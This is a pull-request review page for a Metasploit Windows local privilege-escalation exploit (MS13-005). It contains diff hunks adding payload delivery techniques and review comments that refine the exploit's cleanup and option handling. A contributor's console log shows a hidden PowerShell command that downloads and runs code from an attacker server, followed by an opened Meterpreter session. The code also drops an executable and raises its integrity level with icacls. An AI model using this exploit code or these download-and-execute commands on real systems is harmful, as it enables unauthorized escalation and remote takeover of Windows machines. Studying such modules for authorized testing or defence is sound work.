27 changes: 20 additions & 7 deletions modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
Expand Up @@ -12,10 +12,11 @@
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
include Msf::Post::File
include Msf::Exploit::FileDropper
include Msf::Post::File

def initialize(info={})
super( update_info( info,
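Review bot: The new `include Msf::Exploit::FileDropper` only removes the dropped executable if the FILE branch calls `register_file_for_cleanup` once `write_file` succeeds and the module's `cleanup` reaches `super` (added in the later `def cleanup` hunk); the `if write_file(payload_file, generate_payload_exe)` line in the `def exploit` hunk is cut off before any registration is visible, so confirm it is there, otherwise the payload stays in `%TEMP%\Low` after the session ends.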
Expand All @@ -31,7 +32,11 @@ def initialize(info={})
affects versions Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, RT.
But Spawning a command prompt with the shortcut key does not work in Vista so you will
have to check if the user is already running a command prompt and set SPAWN_PROMPT
false.
false. The WEB technique will use powershell to download and execute a powershell
encoded payload. The FILE technique will drop an executable to the file system, set it
to medium integrity and execute it. The TYPE technique will attempt to execute a
powershell encoded payload directly from the command line but it may take some time to
complete.
},
'License' => MSF_LICENSE,
'Author' =>
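Review bot: Wording in the description: "But Spawning a command prompt" should be lowercase "spawning", and "powershell" reads better as "PowerShell" in prose. It would also help to say that the FILE technique removes the dropped executable on cleanup, since that is why FileDropper is now mixed in.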
Expand Down Expand Up @@ -61,14 +66,14 @@ def initialize(info={})
register_options(
[
OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
OptBool.new('FILESYSTEM', [true, 'Drop payload to filesystem and execute', false])
OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])

], self.class
)

end

# Refactor this into Post lib with adobe_sandbox_adobecollabsync.rb
# Or use GetToken railgun calls?
def low_integrity_level?
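Review bot: `CUSTOM_COMMAND` is only read in the TYPE branch of `exploit` (`elsif datastore['TECHNIQUE'] == 'TYPE'`), so its description "Custom command to type" should say it is ignored for WEB and FILE; a user who sets it with the default TECHNIQUE of WEB currently gets no indication it was never used. The stray blank line before `], self.class` can also go.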
Contributor

Weird, but it looks like it's failing the low integrity check when used from an IE low integrity process :( ... testing further

Contributor Author

Ensure you are in an IE tab rather than the main IE process which may remain Medium Integrity?

P.S. I think it's your code ;)

Contributor

I'm for sure on an IE low integrity process :) see the screenshot below; I just tested deleting the check and it's working smoothly:

msf exploit(ms13_005_hwnd_broadcast) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8081/KBjDzppQFxzsmHk
[*] Server started.
msf exploit(ms13_005_hwnd_broadcast) > [*] Running module against WIN-RNJ7NBRK9L7
[*] Spawning Low Integrity Cmd Prompt
[*] Bruteforcing Taskbar Position
[+] Spawned Medium Integrity Cmd Prompt
[*] Broadcasting payload command to prompt... I hope the user is asleep!
powershell.exe -w hidden -nop -ep bypass -c IEX ((new-object net.webclient).downloadstring('http://192.168.172.1:8081/KBjDzppQFxzsmHk'))
[*] Executing command...
[*] 192.168.172.172  ms13_005_hwnd_broadcast - Delivering Payload
[*] Sending stage (751104 bytes) to 192.168.172.172
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.172:49291) at 2013-07-26 09:21:41 -0500

Need to dig why it's failing :\

Contributor Author

Would be better to check with the token, but you ran into issues yourself looking at that?

You should check the EEGG setting...

tmp_dir = expand_path("%USERPROFILE%")
cd(tmp_dir)
Expand Down Expand Up @@ -115,6 +120,7 @@ def cleanup
vprint_status("Rehiding window...")
client.railgun.user32.ShowWindow(@hwin, 0)
end
super
end

def exploit
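Review bot: `super` is called after the `ShowWindow` railgun call, so if re-hiding the window raises, FileDropper's cleanup (which `super` now reaches) never runs and the dropped file is left behind; wrap the window handling in `begin ... ensure super end` so cleanup always completes.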
Expand All @@ -127,10 +133,11 @@ def exploit
# hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
# integrity process can write.
drop_to_fs = false
if datastore["FILESYSTEM"]
if datastore['TECHNIQUE'] == 'FILE'
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
begin
tmp_dir = expand_path("%TEMP%")
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
cd(tmp_dir)
print_status("Trying to drop payload to #{tmp_dir}...")
if write_file(payload_file, generate_payload_exe)
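Review bot: When TECHNIQUE is FILE but dropping the payload fails, `drop_to_fs` stays false and the later `if drop_to_fs ... else super end` silently falls through to the WEB technique; either `fail_with` here or at least `print_warning` that FILE was requested and the module is falling back to WEB, so the operator knows which delivery actually ran. Also, `tmp_dir[-3,3] =~ /Low/i` will not match a path with a trailing backslash and would then append a second `\Low`; `File.basename(tmp_dir).casecmp('low') == 0` is a safer check.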
Expand All @@ -151,10 +158,16 @@ def exploit
if drop_to_fs
command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
make_it(command)
elsif datastore['TECHNIQUE'] == 'TYPE'
if datastore['CUSTOM_COMMAND']
command = datastore['CUSTOM_COMMAND']
else
command = cmd_psh_payload(payload.encoded)
end
make_it(command)
else
super
end

end

def primer
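Review bot: `if datastore['CUSTOM_COMMAND']` treats an empty string as set (Ruby strings are truthy), so an option cleared to "" would type an empty command into the prompt; use `datastore['CUSTOM_COMMAND'].to_s.empty?` (or `.blank?`) before choosing the branch. Since a custom command replaces `cmd_psh_payload(payload.encoded)`, the module's own payload is not delivered in that case and the handler will not get a session, which the option description should state.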